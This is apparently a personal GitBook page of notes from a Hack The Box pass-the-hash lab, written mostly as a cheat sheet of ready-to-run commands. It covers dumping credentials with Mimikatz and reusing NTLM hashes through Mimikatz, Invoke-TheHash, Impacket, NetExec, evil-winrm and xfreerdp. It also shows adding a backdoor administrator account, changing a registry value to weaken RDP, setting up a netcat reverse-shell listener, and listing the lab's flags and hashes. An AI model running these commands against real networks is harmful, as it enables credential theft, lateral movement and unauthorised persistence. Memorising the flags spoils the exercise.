pass the hash !!

The first tool we will use to perform a Pass the Hash attack is Mimikatz. Mimikatz has a module named sekurlsa::pth that allows us to perform a Pass the Hash attack by starting a process using the hash of the user's password. To use this module, we will need the following:

/user - The user name we want to impersonate.
/rc4 or /NTLM - NTLM hash of the user's password.
/domain - Domain the user to impersonate belongs to. In the case of a local user account, we can use the computer name, localhost, or a dot (.).
/run - The program we want to run with the user's context (if not specified, it will launch cmd.exe).

//

Pass the Hash from Windows Using Mimikatz

mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit

evil-winrm -i 10.129.216.231 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f

Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account?

cd tools

then 

mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

after above just look for julio and david

we got the hash

mimikatz.exe privilege::debug "sekurlsa::pth /user:david /rc4:c39f2beb3d2ec06a62cb887fb391dee0 /domain:inlanefreight.htb /run:cmd.exe" exit

using above we get the cmd from there and then putting dir \\dc01\david

will reveal the dir!

but the best part is like

transfering the file

1> use your powershell ip present no attackbox !!!

PS c:\htb> cd C:\tools\Invoke-TheHash\
PS c:\tools\Invoke-TheHash> Import-Module .\Invoke-TheHash.psd1
PS c:\tools\Invoke-TheHash> Invoke-SMBExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "net user mark Password123 /add && net localgroup administrators mark /add" -Verbose

.\nc.exe -lvnp 8001

generate a rev shell from reverseshell generator website https://www.revshells.com/

Pass the Hash (PtH)-PASSWORD ATTACKSMedium

🪟 PASS-THE-HASH ON WINDOWS

1️⃣ PtH using Mimikatz

Command:

mimikatz.exe privilege::debug "sekurlsa::pth /user:<user> /rc4:<NTLM_hash> /domain:<domain> /run:cmd.exe" exit

Example:

sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe

2️⃣ PtH with Invoke-TheHash (PowerShell)

Import module:

Import-Module .\Invoke-TheHash.psd1

SMB Command Execution:

Invoke-SMBExec -Target <IP> -Domain <domain> -Username <user> -Hash <NTLM> -Command "<command>"

Example (create admin user):

Invoke-SMBExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "net user mark Password123 /add && net localgroup administrators mark /add"

WMI Exec Reverse Shell

Invoke-WMIExec -Target DC01 -Domain <domain> -Username <user> -Hash <NTLM> -Command "<PowerShell encoded payload>"

3️⃣ Reverse Shell Setup (Windows)

Listener:

nc.exe -lvnp 8001

Generate reverse PowerShell payload at: revshells.com

Use WMI / SMB exec to deliver payload.

🐧 PASS-THE-HASH ON LINUX

4️⃣ Impacket PsExec

impacket-psexec <user>@<ip> -hashes :<NTLM_hash>

Example:

impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453

5️⃣ Impacket wmiexec / smbexec / atexec

Examples:

impacket-wmiexec <user>@<ip> -hashes :<hash>
impacket-smbexec <user>@<ip> -hashes :<hash>
impacket-atexec <user>@<ip> -hashes :<hash> "cmd.exe /c whoami"

6️⃣ NetExec (CrackMapExec successor)

Check admin access:

netexec smb <subnet> -u Administrator -H <hash>

Command execution:

netexec smb <IP> -u Administrator -H <hash> -x whoami

Important flag:

--local-auth

Shows reused local admin passwords.

7️⃣ Evil-WinRM (PowerShell Remoting)

evil-winrm -i <IP> -u <user> -H <NTLM_hash>

🖥️ PASS-THE-HASH WITH RDP

RDP using hash:

xfreerdp /v:<IP> /u:<user> /pth:<NTLM_hash>

⚠️ Required Registry Setting

PtH RDP works ONLY when:

HKLM\System\CurrentControlSet\Control\Lsa\
DisableRestrictedAdmin = 0

Set via:

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

🔒 UAC (Local Accounts Limitation)

Local admins cannot perform remote admin tasks unless:

LocalAccountTokenFilterPolicy = 1

Domain accounts → NOT affected.

🏁 EXERCISE FLAGS (SUMMARY FOR GITBOOK — OPTIONAL)

Task

Flag

Read C:\pth.txt

G3t_4CCE$$_V1@_PTH

Registry value for RDP PtH

DisableRestrictedAdmin

David NTLM Hash

c39f2beb3d2ec06a62cb887fb391dee0

Shared folder david.txt

D3V1d_Fl5g_is_Her3

Shared folder julio.txt

JuL1()_SH@re_fl@g

Reverse shell → julio flag

JuL1()_N3w_fl@g

🎯 PASS-THE-HASH ATTACK CHEAT SHEET (for GitBook top section)

Windows (Mimikatz):
sekurlsa::pth /user:<u> /rc4:<hash> /domain:<d> /run:cmd.exe

PowerShell:
Invoke-SMBExec -Target <IP> -Username <u> -Hash <hash> -Command "<cmd>"

Linux (Impacket):
impacket-psexec <user>@<IP> -hashes :<NTLM>

Linux (RDP):
xfreerdp /v:<IP> /u:<user> /pth:<hash>

PreviousPass-the-Hash over RDP (DisableRestrictedAdmin Bypass)Nextlxd

Last updated 3 months ago

Was this helpful?

Good night

hashtag🪟 PASS-THE-HASH ON WINDOWS

hashtag1️⃣ PtH using Mimikatz

hashtag2️⃣ PtH with Invoke-TheHash (PowerShell)

hashtagImport module:

hashtagSMB Command Execution:

hashtagWMI Exec Reverse Shell

hashtag3️⃣ Reverse Shell Setup (Windows)

hashtagListener:

hashtag🐧 PASS-THE-HASH ON LINUX

hashtag4️⃣ Impacket PsExec

hashtag5️⃣ Impacket wmiexec / smbexec / atexec

hashtag6️⃣ NetExec (CrackMapExec successor)

hashtag7️⃣ Evil-WinRM (PowerShell Remoting)

hashtag🖥️ PASS-THE-HASH WITH RDP

hashtagRDP using hash:

hashtag⚠️ Required Registry Setting

hashtag🔒 UAC (Local Accounts Limitation)

hashtag🏁 EXERCISE FLAGS (SUMMARY FOR GITBOOK — OPTIONAL)

hashtag🎯 PASS-THE-HASH ATTACK CHEAT SHEET (for GitBook top section)